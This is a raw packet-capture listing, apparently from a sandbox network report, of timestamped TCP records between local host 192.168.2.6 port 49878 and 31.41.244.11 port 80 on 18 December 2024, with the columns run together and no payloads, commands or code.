                                                                                                                                                              Dec 18, 2024 11:47:45.672126055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.800194025 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.800218105 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.800235033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.800265074 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.800302029 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.801261902 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.801280022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.801311016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.801331997 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.802778959 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.802797079 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.802814007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.802826881 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.802845001 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.802855015 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.804075956 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.804094076 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.804111004 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.804119110 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.804133892 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.804150105 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.806243896 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.806261063 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.806277990 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.806296110 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.806315899 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.807502031 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.807518005 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.807533979 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.807543039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.807570934 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.809720039 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.809739113 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.809756994 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.809763908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.809789896 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.810334921 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.810376883 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.812119007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.812135935 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.812153101 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.812163115 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.812187910 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.813477993 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.813493967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.813509941 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.813523054 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.813548088 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.815557003 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.815576077 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.815592051 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.815603971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.815622091 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.816847086 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.816863060 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.816888094 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.816890001 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.816912889 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.816927910 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.818353891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.818372965 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.818401098 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.818413973 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.820348024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.820365906 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.820394039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.820410013 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.821439028 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.821455002 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.821471930 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.821501017 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.821530104 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.822688103 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.822704077 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.822727919 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.822731018 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.822748899 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.822767019 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.824987888 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.825005054 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.825021982 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.825030088 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.825083971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.825083971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.826173067 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.826189041 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.826205969 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.826211929 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.826225042 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.826241016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.828516960 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.828533888 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.828552008 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.828571081 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.828593016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.828593016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.829607964 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.829624891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.829651117 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.829664946 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.830334902 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.830377102 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.831928968 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.831945896 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.831963062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.831971884 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.831985950 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.832001925 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.833233118 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.833249092 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.833265066 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.833275080 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.833287001 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.833303928 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.834249973 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.834306955 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.834479094 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.834630966 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.835675001 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.835692883 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.835716963 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.835731030 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.836608887 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.836652040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.836700916 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.836745024 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.838332891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.838356018 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.838397026 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.838457108 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.838927031 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.838973999 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.839020014 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.839066029 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.840836048 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.840857029 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.840903997 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.842425108 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.842441082 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.842466116 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.842478991 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.842497110 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.842509031 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.843739033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.843755960 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.843771935 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.843786955 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.843811035 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.845933914 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.845948935 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.845964909 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.845984936 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.845997095 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.846046925 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.846091032 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.847582102 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.847600937 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.847629070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.847640991 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.849071026 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.849086046 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.849118948 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.849138021 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.850646019 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.850662947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.850680113 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.850694895 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.850704908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.850723982 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.851900101 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.851917028 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.851933956 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.851947069 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.851957083 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.851975918 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.853595972 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.853612900 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.853646040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.853658915 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.854262114 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.854279995 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.854305983 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.854315996 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.856491089 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.856512070 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.856528997 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.856555939 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.856585026 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.857249975 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.857294083 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.858872890 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.858890057 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.858906031 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.858922005 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.858932972 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.858951092 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.859997988 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.860013962 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.860030890 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.860044956 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.860070944 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.991596937 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.991626024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.991643906 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.991743088 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.991791964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.992680073 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.992697001 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.992719889 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.992818117 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.992818117 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.992832899 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.994276047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.994292974 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.994332075 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.994335890 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.996448994 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.996464968 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.996481895 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.996494055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.996510983 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.996752024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.998805046 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.998822927 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.998838902 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.998855114 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.998867989 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.998888969 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.000170946 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.000190020 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.000206947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.000211954 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.000226974 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.000243902 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.002376080 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.002393007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.002423048 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.002435923 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.002458096 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.003449917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.003468037 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.003506899 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.004724026 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.004740000 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.004755974 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.004786968 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.004797935 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.006988049 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.007006884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.007023096 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.007046938 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.007070065 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.008387089 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.009526968 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.009547949 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.009566069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.009572983 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.009597063 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.010565042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.010581017 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.010597944 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.010617971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.010632038 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.012859106 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.012876987 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.012895107 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.012908936 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.012923956 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.014014959 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.014030933 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.014045954 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.014072895 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.014086008 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.016367912 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.016390085 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.016408920 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.016416073 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.016429901 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.016447067 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.017045975 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.018697023 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.018718958 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.018735886 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.018743038 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.018769026 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.020332098 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.020354033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.020370960 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.020379066 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.020402908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.022238970 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.022265911 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.022281885 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.022330999 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.022366047 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.022407055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.024568081 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.024588108 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.024604082 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.024624109 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.024643898 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.025362015 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.026843071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.026859045 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.026875019 CET804987831.41.244.11192.168.2.6
